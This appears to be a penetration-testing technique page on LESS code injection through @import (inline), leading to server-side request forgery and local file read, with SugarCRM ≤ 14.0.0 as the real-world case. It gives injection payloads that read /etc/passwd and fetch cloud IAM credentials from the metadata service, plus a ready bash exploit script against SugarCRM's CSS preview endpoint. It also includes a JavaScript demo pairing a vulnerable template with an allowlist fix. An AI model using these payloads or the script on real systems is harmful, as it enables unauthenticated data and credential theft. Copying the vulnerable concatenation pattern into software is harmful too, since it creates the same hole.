LESS Code Injection leading to SSRF & Local File Read

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation the LESS engine fetches the resources referenced in @import statements and, when the (inline) option is used, inserts their contents verbatim into the resulting CSS without processing them as LESS.

When an application concatenates user-controlled input into a string that is later parsed by the LESS compiler, an attacker can inject arbitrary LESS code. By abusing @import (inline) the attacker can force the server to fetch:

  • Local files via the file:// protocol (information disclosure / local file read).
  • Remote resources on internal networks or cloud metadata services (SSRF).

This technique has been observed in real-world products such as SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploitation

  1. Identify a parameter that is reflected directly into a stylesheet string processed by the LESS engine (e.g. ?lm= in SugarCRM).
  2. Close the current statement and inject new directives. The most common primitives are:
     • ; – terminates the previous declaration.
     • } – closes the previous block (if required).
  3. Use @import (inline) '<URL>'; to read arbitrary resources.
  4. Optionally inject a marker (data: URI) after the import to make it easier to extract the fetched content from the compiled CSS; a trailing // comments out whatever remains of the original line.
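A worked example of the procedure above and of the concatenation pattern described at the top of the page, added here and not taken from SugarCRM or less.js: the stylesheet template, the parameter name `lm` and its assumed integer shape are assumptions for illustration. `demo()` needs the less npm package and imports an absolute path between CSS comment markers, because less.js on Node resolves absolute paths for (inline) imports; the data: URI markers used against SugarCRM depend on the target compiler's file loader. Everything else is pure and runs offline on a constructed response.

```javascript
// Added example, not code from SugarCRM or less.js. It shows a stylesheet template
// that concatenates a request parameter (hypothetical name `lm`, assumed to be a
// cache-busting integer), the @import (inline) payload with markers, extraction
// of the inlined resource from the compiled CSS, and an allowlist check that
// blocks the payload. Only demo() touches less.js (`npm install less`).

const START = '@@START@@';
const END = '@@END@@';

// Vulnerable pattern: the raw parameter is spliced into LESS source text.
function buildStylesheetUnsafe(lm) {
  return `@lm: ${lm};\n.preview { content: "@{lm}"; }\n`;
}

// Hardened pattern: accept only the shape the parameter is meant to have before it
// reaches the compiler. Rejecting beats escaping here: in raw LESS source there is
// no quoting that neutralises `;`, `}` and `@import`.
function buildStylesheetSafe(lm) {
  if (!/^\d{1,12}$/.test(String(lm))) {
    throw new Error(`invalid lm value: ${JSON.stringify(lm)}`);
  }
  return buildStylesheetUnsafe(lm);
}

// Marker statements. The data: URI form is the one used against SugarCRM above;
// whether a compiler honours data: and file:// URLs depends on its file loader.
// A CSS block comment survives less.js compilation unchanged and is used by demo().
const dataUriMarker = (m) => `@import (inline) 'data:text/plain,${m}';`;
const commentMarker = (m) => `/*${m}*/`;

// The injection primitive: `1;` closes the declaration being built, the import
// inlines the target between two markers, and `//` comments out the rest of the line.
function buildPayload(resource, marker = dataUriMarker) {
  return ['1;', marker(START), `@import (inline) '${resource}';`, marker(END), '//'].join(' ');
}

// Query-string encoding of the payload (same idea as quote_plus in the bash PoC).
function encodeForQuery(payload) {
  return encodeURIComponent(payload).replace(/%20/g, '+');
}

// Locate the inlined resource in the compiled CSS; null if the markers are absent.
function extractBetweenMarkers(css) {
  const s = css.indexOf(START);
  if (s === -1) return null;
  const e = css.indexOf(END, s + START.length);
  if (e === -1) return null;
  return css.slice(s + START.length, e);
}

// Constructed sample of a compiled response (not captured from a real target).
const SAMPLE_COMPILED_CSS =
  '@@START@@root:x:0:0:root:/root:/bin/bash\n' +
  'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n' +
  '@@END@@\n.preview {\n  content: "1";\n}\n';

// End-to-end with a real compiler: less.js reads absolute paths for (inline)
// imports, so /etc/hostname is leaked into the CSS built by the vulnerable template.
async function demo() {
  const less = require('less');
  const payload = buildPayload('/etc/hostname', commentMarker);
  const { css } = await less.render(buildStylesheetUnsafe(payload), { javascriptEnabled: false });
  console.log('leaked:', JSON.stringify(extractBetweenMarkers(css)));
  try {
    buildStylesheetSafe(payload);
  } catch (e) {
    console.log('blocked:', e.message);
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  demo().catch((e) => console.error('demo skipped:', e.message));
}
```

The SSRF variant is the same call with a URL as the resource, e.g. `buildPayload('http://169.254.169.254/latest/meta-data/')`; the allowlist in `buildStylesheetSafe` rejects it for the same reason it rejects the file read, because the value is no longer a bare integer.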

Local File Read

```less
1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //
```

The contents of /etc/passwd will appear in the HTTP response immediately before the @@END@@ marker.

SSRF – Cloud Metadata

```less
1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //
```

Automated PoC (SugarCRM example)

```bash
#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ file:///etc/passwd
set -euo pipefail

TARGET="$1"        # Base URL of the SugarCRM instance (with trailing slash)
RESOURCE="$2"      # file:// path or URL to fetch

# Close the current declaration, inline a start marker, the target resource and an
# end marker, then comment out the rest of the original line.
PAYLOAD="1; @import (inline) 'data:text/plain,@@START@@'; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//"
INJ=$(python3 -c 'import sys, urllib.parse; print(urllib.parse.quote_plus(sys.argv[1]))' "$PAYLOAD")

# The fetched content is inlined between the two markers in the compiled CSS.
curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
  awk '/@@START@@/ { f = 1; sub(/.*@@START@@/, "") }
       f { if (sub(/@@END@@.*/, "")) { print; exit } print }'
```

Real-World Examples

| Product | Affected endpoint | Impact |
| --- | --- | --- |
| SugarCRM ≤ 14.0.0 | /rest/v10/css/preview?lm= | Unauthenticated SSRF & local file read |
